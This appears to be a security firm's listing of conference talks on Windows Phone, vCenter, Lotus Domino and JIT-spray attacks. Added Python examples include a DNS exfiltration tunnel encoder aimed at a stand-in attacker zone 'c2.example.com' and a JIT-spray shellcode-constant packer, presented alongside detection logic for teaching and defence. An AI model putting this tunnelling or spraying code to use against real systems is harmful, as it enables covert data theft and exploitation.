
Research Revealed

  • Presentation “Windows Phone 8 application security” from Hack in Paris 2013

    When the first Windows Phone 8 smartphones were released, users received a new mobile OS with many features. Owners of such devices can find plenty of useful, user-friendly tools for business and leisure... if only security were not an issue. Dmitriy Evdokimov, director of the ERPScan research group, and Andrey Chasovskikh, a financial software developer, spoke about how applications are secured in this OS and what developers should pay attention to. They also presented a tool for analyzing Windows Phone applications and showed the audience how to use it to find vulnerabilities.

    The slides are available here.

    Authors: Dmitriy Evdokimov, Andrey Chasovskikh.

    Posted on June 26, 2013 | Filed under Research Revealed
  • Presentation and whitepaper “Inspection of Windows Phone Applications” from BlackHat Abu Dhabi 2012

    The market share of Windows Phone devices continues to grow, and with it the number of WP applications, from simple games and social apps to complex business apps. The WP security model is considered secure; nevertheless, the applications themselves may have vulnerabilities.

    In this presentation we show the techniques we use to analyze the security of WP applications and introduce a new tool that makes the analysis much easier. The tool supports both static and dynamic (code instrumentation) techniques; in fact, it is an environment for WP application analysis. We also show on real examples how to find vulnerabilities with this tool and exploit them.

    The slides can be downloaded here.
    The whitepaper can be downloaded here.

    Authors: Dmitriy Evdokimov, Andrey Chasovskikh

    Posted on December 3, 2012 | Filed under Research Revealed
  • Presentation “How to Hack VMware vCenter Server in 60 Seconds” from DEFCON 2012

    This talk discusses some ways to gain control over the virtual infrastructure through vCenter's services. I describe a few bugs that are not dangerous on their own (they were 0-days when we found them), but if we use all of them together, we get administrative access to vCenter, which means access to the whole virtual network.

    Author: Alexander Minozhenko

    Presentation "How to Hack VMware vCenter Server in 60 Seconds" from DEFCON 2012.

    Posted on August 13, 2012 | Filed under Research Revealed
  • Presentation “Light and Dark side of Code Instrumentation” from CONFidence Krakow 2012

    Development technologies evolve rapidly, and code becomes more complex (virtual functions, JIT code, etc.). Such code is extremely difficult to analyze statically, and this is where the various code instrumentation techniques help. Instrumentation libraries (PIN, Valgrind, DynamoRIO, DynInst) are among the most up-to-date essential tools in a security researcher's kit; much important research cannot be done without code instrumentation nowadays. I describe the existing methods of instrumentation (source code instrumentation, bytecode instrumentation, binary code instrumentation), from the simplest to the most complex, and their pros and cons when it comes to solving the various problems security researchers face.

    Author: Dmitriy Evdokimov.

    Presentation "Light and Dark side of Code Instrumentation" from CONFidence Krakow 2012
    Posted on June 6, 2012 | Filed under Research Revealed
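The talk above surveys instrumentation methods without showing one. The block below is an added example, not code from the talk or from ERPScan, of the simplest dynamic variant: a runtime trace hook. It instruments a constructed toy parser (`check_magic`) through Python's `sys.settrace`, records which lines each input executes, and uses the coverage difference between inputs to rank inputs and to locate the branch that rejected one, which is the same question a Pin or DynamoRIO tool answers for native code. The target function, its inputs and all helper names are constructed for the example.

```python
import sys


def check_magic(data: bytes) -> int:
    # Constructed sample target: a small header check with one rejection per branch.
    if len(data) < 4:
        return 1
    if data[:2] != b"RV":
        return 2
    if data[2] != 0x01:
        return 3
    if data[3] % 2:
        return 4
    return 0


def trace_lines(func, *args):
    """Run func under sys.settrace; return (result, set of func's line numbers that executed).

    Only frames belonging to `func` get a local trace function; every other frame
    created during the call is left untraced, so the hook sees just the target."""
    hits = set()
    target = func.__code__

    def tracer(frame, event, arg):
        if event == "call":
            # Returning None here means "do not trace this frame", which keeps the
            # overhead out of helpers the target calls.
            return tracer if frame.f_code is target else None
        if event == "line" and frame.f_code is target:
            hits.add(frame.f_lineno)
        return tracer

    previous = sys.gettrace()
    sys.settrace(tracer)
    try:
        result = func(*args)
    finally:
        sys.settrace(previous)   # always restore, even if the target raised
    return result, frozenset(hits)


def coverage_gains(func, inputs):
    """Feed inputs in order and report how many not-yet-seen lines each one reaches.

    This is the core loop of coverage-guided input selection: an input that adds
    no new lines is not worth keeping."""
    seen = set()
    gains = []
    for inp in inputs:
        _, hits = trace_lines(func, inp)
        gains.append(len(hits - seen))
        seen |= hits
    return gains


def lines_only_good_reaches(func, good, bad):
    """Lines executed by `good` but never by `bad`, sorted.

    The first entry sits right after the branch that rejected `bad`, which is the
    spot a researcher looks at when deciding how to mutate the input."""
    _, ok = trace_lines(func, good)
    _, nok = trace_lines(func, bad)
    return sorted(ok - nok)


# Constructed inputs, each failing one check deeper than the previous one.
SAMPLE_INPUTS = [b"", b"XXXX", b"RV\x00\x00", b"RV\x01\x01", b"RV\x01\x02"]

if __name__ == "__main__":
    for inp in SAMPLE_INPUTS:
        result, hits = trace_lines(check_magic, inp)
        print("%-14r -> result %d, %d lines executed" % (inp, result, len(hits)))
    print("coverage gains in order:", coverage_gains(check_magic, SAMPLE_INPUTS))
    print("lines XXXX never reaches:", lines_only_good_reaches(check_magic, b"RV\x01\x02", b"XXXX"))
```

The hook costs nothing to set up but slows the traced function heavily and only sees Python-level lines; binary instrumentation gives the same data for native code at basic-block or instruction granularity, at the price of a much larger toolchain, which is the kind of trade-off the talk compares.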
  • Whitepaper “Python arsenal for Reverse Engineering” v1.1

    This whitepaper (version 1.1) is a collection of Python engines, extensions, libraries and shells that help with understanding, analyzing and sometimes breaking code. The collection consists of more than 40 projects. The document is intended to show the power of Python for RE and is also an attempt to systematize knowledge about Python for RE. It is useful both for beginners and for advanced RE professionals.

    Dmitriy Evdokimov, author of the whitepaper and researcher at ERPScan:

    The Python programming language has become the language of hackers. This is not surprising, because it has all the necessary qualities: it is free, portable, powerful, mixable, easy to learn, etc. A great role in this was played by projects such as IDA Pro, WinDBG, OllyDbg and gdb, which, being the de facto standard among disassemblers and debuggers, eventually began to support Python scripting engines. Of course, they had maintained their own APIs for plug-in development, and there were not a few of them, but it was precisely with the appearance of Python support that they received a strong push in development: the number of plug-ins increased, the community grew, and of course their flexibility also increased, which allowed them to interact both with each other and with other applications, using the best aspects of each. But at the beginning of the path there was, naturally, only hacker spirit and an idea.
    Python arsenal for RE 1.1.pdf
    Posted on April 26, 2012 | Filed under Research Revealed
  • Whitepaper “Lotus Domino: Penetration Through the Controller” from BlackHat Europe 2012

    At the BlackHat Europe conference, held from March 14 to March 16, Alexey Sintsov, head of the information security audit department at ERPScan, shared his experience in penetration testing and presented the results of recent research into Lotus Domino security.

    His presentation addressed the lack of time, and frequently of desire, on the part of companies to dig into the details of existing vulnerabilities in order to exploit them, and how this often impairs the quality of their work.

    In the demonstration, a private vulnerability in Lotus Domino was quickly reverse-engineered, the resulting exploit used, the existing patch bypassed and a critical 0-day vulnerability found. The result was an attack on the Domino Controller service (the Lotus Domino administration service) that allows full server compromise.

    Whitepaper "Lotus Domino: Penetration Through the Controller", BlackHat Europe 2012

    Posted on March 26, 2012 | Filed under Research Revealed
  • Presentation “Lotus Domino: Penetration Through the Controller” from BlackHat Europe 2012

    The abstract is the same as for the whitepaper entry above.

    "Lotus Domino: Penetration Through the Controller", BlackHat Europe 2012

    Posted on March 26, 2012 | Filed under Research Revealed
  • Whitepaper “Python arsenal for Reverse Engineering”

    This is the earlier beta release of the whitepaper described in the v1.1 entry above; the abstract and the author's note are the same.
    Python arsenal for RE.pdf
    Posted on July 6, 2011 | Filed under Research Revealed
  • Presentation “DNS for EVIL” from CONFidence Krakow 2011

    This talk is about the DNS reverse tunnel the author uses in penetration tests. It also publishes the author's own reverse DNS shellcode and payload, written especially for pen-test tasks. The work further demonstrates how a malware C&C and a bot can work together over DNS. The main idea of the work is that DNS traffic deserves much more attention.

    Download this presentation

    Posted on June 6, 2011 | Filed under Research Revealed
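The abstract above describes a reverse DNS tunnel and argues that DNS traffic deserves more attention. The following is an added Python example, not the author's tool, shellcode or payload, that shows both sides of that argument: how data is framed into query names (base32 labels under an attacker-controlled zone, here the reserved name c2.example.com, with a sequence label so that reordered or retried queries still reassemble) and a defender-side heuristic run over constructed resolver log lines that flags the zone by the count, length and entropy of its subdomains. The log format, the domain and the payload are constructed for the example.

```python
import base64
import hashlib
import math
from collections import Counter, defaultdict

MAX_LABEL = 63          # RFC 1035 label limit
MAX_NAME = 253          # RFC 1035 name limit in text form
CHUNK = 35              # 35 raw bytes -> 56 base32 characters, no '=' padding
LABELS_PER_QUERY = 3    # 105 payload bytes per query


def encode_tunnel(data: bytes, domain: str) -> list:
    """Client side: pack data into query names of the form <seq>.<b32>.<b32>.<b32>.<domain>."""
    names = []
    per_query = CHUNK * LABELS_PER_QUERY
    for seq, off in enumerate(range(0, len(data), per_query)):
        piece = data[off:off + per_query]
        labels = [base64.b32encode(piece[i:i + CHUNK]).decode().lower().rstrip("=")
                  for i in range(0, len(piece), CHUNK)]
        name = ".".join(["%04x" % seq] + labels + [domain])
        if any(len(l) > MAX_LABEL for l in name.split(".")) or len(name) > MAX_NAME:
            raise ValueError("query name exceeds DNS limits: %s" % name)
        names.append(name)
    return names


def decode_tunnel(names, domain: str) -> bytes:
    """Server side: reassemble by sequence number; duplicates and reordering are harmless."""
    suffix = "." + domain.lower()
    parts = {}
    for name in names:
        name = name.lower().rstrip(".")          # resolvers may change case; base32 does not care
        if not name.endswith(suffix):
            continue
        labels = name[:-len(suffix)].split(".")
        raw = b""
        for label in labels[1:]:
            label = label.upper()
            raw += base64.b32decode(label + "=" * (-len(label) % 8))   # restore stripped padding
        parts[int(labels[0], 16)] = raw
    return b"".join(parts[k] for k in sorted(parts))


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values()) if s else 0.0


def suspicious_domains(log_lines, min_unique=20, min_len=60, min_entropy=3.5) -> dict:
    """Defender side: flag parent domains with many distinct, long, high-entropy subdomains.

    The log line format is constructed for this example: '<timestamp> <client> <qname> <qtype>'."""
    per_parent = defaultdict(set)
    for line in log_lines:
        qname = line.split()[2].rstrip(".").lower()
        labels = qname.split(".")
        # Crude registrable-domain guess; a real detector should use a public-suffix list.
        parent = ".".join(labels[-2:])
        per_parent[parent].add(qname)
    flagged = {}
    for parent, qnames in per_parent.items():
        avg_len = sum(len(q) for q in qnames) / len(qnames)
        avg_ent = sum(shannon_entropy(q[:-len(parent) - 1].replace(".", "")) for q in qnames) / len(qnames)
        if len(qnames) >= min_unique and avg_len >= min_len and avg_ent >= min_entropy:
            flagged[parent] = {"unique": len(qnames), "avg_len": round(avg_len, 1),
                               "avg_entropy": round(avg_ent, 2)}
    return flagged


def sample_payload(n_blocks=96) -> bytes:
    """Constructed, deterministic stand-in for exfiltrated data (3072 bytes)."""
    return b"".join(hashlib.sha256(b"block-%d" % i).digest() for i in range(n_blocks))


TUNNEL_DOMAIN = "c2.example.com"     # assumed attacker-controlled zone (reserved example name)

# Constructed resolver log: the tunnel traffic plus a little ordinary browsing.
SAMPLE_LOG = (
    ["2011-06-06T10:00:%02dZ 10.0.0.5 %s TXT" % (i % 60, q)
     for i, q in enumerate(encode_tunnel(sample_payload(), TUNNEL_DOMAIN))]
    + ["2011-06-06T10:01:00Z 10.0.0.7 www.example.org A",
       "2011-06-06T10:01:01Z 10.0.0.7 mail.example.org MX",
       "2011-06-06T10:01:02Z 10.0.0.8 www.example.org A"]
)

if __name__ == "__main__":
    names = encode_tunnel(sample_payload(), TUNNEL_DOMAIN)
    print("%d queries, first: %s" % (len(names), names[0]))
    print("round trip ok:", decode_tunnel(names, TUNNEL_DOMAIN) == sample_payload())
    print("flagged:", suspicious_domains(SAMPLE_LOG))
```

Base32 rather than base64 is used because DNS labels are case-insensitive and resolvers may fold or randomize case; the decoder upper-cases before decoding for the same reason. The thresholds are starting points, not tuned values: CDNs, anti-spam lookups and some telemetry also produce many long, high-entropy subdomains, so a production detector needs a baseline of the network's own DNS traffic and a public-suffix list instead of the two-label guess used here.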
  • Presentation “JIT-Spray Attacks and Advanced Shellcode” from HITB Amsterdam 2010

    Here are the slides from Hack In The Box (HITB) 2010, held in Amsterdam, Netherlands, where DSecRG experts gave a talk on the JIT-SPRAY technique for DEP and ASLR bypass. The talk presents methods that reduce the running time of a Flash JIT-SPRAY exploit from 8 minutes to 10 seconds, and shows how the Safari JavaScript JIT compiler can be used to bypass DEP and ASLR on Windows 7.

    Author: Alexey Sintsov

    JIT-Spray Attacks and Advanced Shellcode

    Posted on July 5, 2010 | Filed under Research Revealed
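As an added example, not the DSecRG exploit or anything from the slides, the Python below models the framing trick behind JIT spraying on 32-bit x86: each constant in a long XOR chain carries three shellcode bytes plus a 0x3C top byte, so that when a naive JIT emits `mov eax, imm32 ; xor eax, imm32 ; ...` and execution starts one byte into the buffer, the `35` opcode of each XOR is swallowed by `3C 35` (`cmp al, 0x35`) and only the payload bytes run. The JIT output shape is an idealized model (real JITs choose registers and layout differently, and several later JITs added constant blinding against exactly this), and the sample payload is constructed so that every three bytes end on an instruction boundary.

```python
# x86-32 encodings assumed throughout:
#   B8 imm32 = mov eax, imm32    35 imm32 = xor eax, imm32    3C ib = cmp al, ib
MOV_EAX_IMM32 = 0xB8
XOR_EAX_IMM32 = 0x35
MARKER = 0x3C          # top byte of every constant; "3C 35" decodes as cmp al, 0x35
NOP = 0x90


def pack_constants(payload: bytes) -> list:
    """Turn payload into imm32 values: three payload bytes per constant, marker byte on top."""
    padded = payload + bytes([NOP]) * (-len(payload) % 3)   # pad the last group with nops
    consts = []
    for i in range(0, len(padded), 3):
        b0, b1, b2 = padded[i:i + 3]
        consts.append(b0 | (b1 << 8) | (b2 << 16) | (MARKER << 24))
    return consts


def javascript_expression(consts, var="spray") -> str:
    """The source statement a spray script would repeat in many functions."""
    return "var %s = (%s);" % (var, " ^ ".join("0x%08x" % c for c in consts))


def model_jit_output(consts) -> bytes:
    """Idealized code a naive JIT emits for the chain: mov eax, c0 ; xor eax, c1 ; xor eax, c2 ..."""
    code = bytes([MOV_EAX_IMM32]) + consts[0].to_bytes(4, "little")
    for c in consts[1:]:
        code += bytes([XOR_EAX_IMM32]) + c.to_bytes(4, "little")
    return code


def recover_payload(code: bytes, entry: int = 1) -> bytes:
    """Walk the emitted stream from `entry` the way the CPU would: three payload bytes,
    then a 3C 35 pair (cmp al, 0x35), repeated. Returns the bytes that would execute as
    shellcode and raises if the framing is broken, e.g. when entered at offset 0."""
    out = bytearray()
    pos = entry
    while pos + 3 <= len(code):
        out += code[pos:pos + 3]
        pos += 3
        if pos + 2 <= len(code):
            if code[pos] != MARKER or code[pos + 1] != XOR_EAX_IMM32:
                raise ValueError("framing broken at offset %d" % pos)
            pos += 2
        elif pos + 1 == len(code) and code[pos] == MARKER:
            pos += 1   # trailing marker byte of the last constant
    return bytes(out)


# Constructed sample payload: groups of x86-32 instructions that each end on a 3-byte
# boundary, so the inserted "cmp al, 0x35" lands between instructions and only touches flags.
SAMPLE_PAYLOAD = bytes([0x31, 0xC0, 0x90,   # xor eax, eax ; nop
                        0x6A, 0x00, 0x90,   # push 0 ; nop
                        0x83, 0xC0, 0x01])  # add eax, 1

if __name__ == "__main__":
    consts = pack_constants(SAMPLE_PAYLOAD)
    print(javascript_expression(consts))
    code = model_jit_output(consts)
    print("emitted:", code.hex(" "))
    print("executed from offset 1:", recover_payload(code).hex(" "))
```

The remaining steps of a real attack (how a particular JIT actually lays the code out, how much spraying is needed before an address becomes predictable, and how control flow is made to land at offset 1) are outside this block; it only checks that the framing survives the model compiler, which is the invariant the real shellcode must preserve as well.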